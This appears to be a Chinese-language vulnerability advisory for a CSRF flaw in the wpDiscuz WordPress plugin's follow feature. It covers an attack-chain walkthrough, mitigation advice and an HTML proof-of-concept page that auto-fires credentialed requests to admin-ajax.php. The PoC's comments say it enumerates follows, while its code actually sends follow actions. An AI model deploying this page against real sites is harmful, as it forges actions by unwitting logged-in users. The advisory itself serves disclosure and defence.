CVE-2026-22215 wpDiscuz 7.6.47之前版本CSRF漏洞可枚举用户关注关系

漏洞信息

漏洞编号

CVE-2026-22215

漏洞类型

CSRF（跨站请求伪造）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

wpDiscuz

漏洞概述

CVE-2026-22215是WordPress插件wpDiscuz在7.6.47之前版本中存在的一个跨站请求伪造（CSRF）安全漏洞。该漏洞位于插件的getFollowsPage()函数中，由于缺少必要的nonce验证机制，攻击者可以构造恶意的请求来触发未授权的操作。wpDiscuz是一款广泛使用的WordPress评论增强插件，为网站提供实时评论、投票和社交分享等功能。由于该插件在WordPress生态中拥有大量用户，此CSRF漏洞可能影响到众多使用该插件的网站。攻击者可以利用此漏洞枚举网站用户的关注关系，包括查看哪些用户关注了哪些其他用户，以及用户的社交互动模式。此外，攻击者还可能利用此漏洞操纵用户的关注数据，在用户不知情的情况下添加或删除关注关系。这种信息泄露和操作可能会被用于进一步的社会工程攻击、用户画像分析或其他恶意活动。

技术细节

该漏洞的根源在于wpDiscuz插件的getFollowsPage()函数缺少WordPress标准的nonce验证机制。WordPress通常使用wp_verify_nonce()函数来验证请求的合法性，防止CSRF攻击。然而，受影响的版本中，getFollowsPage()函数直接处理用户请求而没有进行此项验证。攻击者可以创建一个包含恶意请求的网页，当已登录的WordPress用户访问该页面时，浏览器会自动向目标网站发送请求。由于浏览器会自动携带用户的会话Cookie，服务器会认为这是来自合法用户的请求。攻击者可以利用此漏洞执行以下操作：1）通过构造特定的GET/POST请求参数，枚举用户的关注列表和关注关系；2）通过操纵请求参数，在用户不知情的情况下修改其关注数据。由于该漏洞不需要认证（PR:N），任何能够诱导用户访问恶意页面的攻击者都可以利用此漏洞。攻击复杂度低（AC:L），只需要用户访问恶意页面即可。

攻击链分析

STEP 1

步骤1

攻击者创建包含恶意JavaScript代码或自动提交表单的网页，该页面包含针对wpDiscuz getFollowsPage()函数的请求

STEP 2

步骤2

攻击者通过钓鱼邮件、社交媒体或其他方式诱导已登录wpDiscuz用户的WordPress网站访问恶意页面

STEP 3

步骤3

用户浏览器加载恶意页面后，自动向目标WordPress网站发送带有用户会话Cookie的AJAX请求

STEP 4

步骤4

由于getFollowsPage()函数缺少nonce验证，服务器将请求视为合法用户操作

STEP 5

步骤5

攻击者成功枚举用户关注关系或操纵用户的关注数据，包括查看、添加或删除关注

STEP 6

步骤6

攻击者收集的信息可用于进一步的攻击，如用户画像分析、社会工程攻击或针对性钓鱼

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2026-22215 - wpDiscuz getFollowsPage CSRF -->
<html>
<head>
    <title>CVE-2026-22215 CSRF PoC</title>
</head>
<body>
    <h1>CVE-2026-22215 - wpDiscuz CSRF PoC</h1>
    <p>This PoC demonstrates the CSRF vulnerability in wpDiscuz getFollowsPage()</p>
    
    <script>
        // Enumerate follows relationships
        function exploitEnumFollows() {
            fetch('https://target-site.com/wp-admin/admin-ajax.php', {
                method: 'POST',
                credentials: 'include',
                headers: {
                    'Content-Type': 'application/x-www-form-urlencoded',
                },
                body: 'action=wpdiscuz_follow_page&do=follow&userId=1'
            })
            .then(response => response.json())
            .then(data => console.log('Follow response:', data))
            .catch(error => console.error('Error:', error));
        }
        
        // Execute on page load
        window.onload = function() {
            console.log('CSRF PoC executing...');
            exploitEnumFollows();
        };
    </script>
    
    <!-- Auto-submit form for manipulating follows -->
    <form id="csrfForm" action="https://target-site.com/wp-admin/admin-ajax.php" method="POST">
        <input type="hidden" name="action" value="wpdiscuz_follow_page">
        <input type="hidden" name="do" value="follow">
        <input type="hidden" name="userId" value="TARGET_USER_ID">
    </form>
    
    <script>
        // Auto-submit for follow manipulation
        document.getElementById('csrfForm').submit();
    </script>
</body>
</html>

影响范围

wpDiscuz < 7.6.47

防御指南

临时缓解措施

如果无法立即更新插件，可以采取以下临时缓解措施：1）在Web应用防火墙（WAF）中添加针对该AJAX端点的CSRF保护规则；2）限制wpdiscuz_follow_page AJAX动作的访问频率；3）监控异常的follow操作请求日志；4）考虑暂时禁用wpDiscuz的follow功能直到完成升级；5）确保所有管理员和用户都了解CSRF攻击的风险，避免点击未知链接。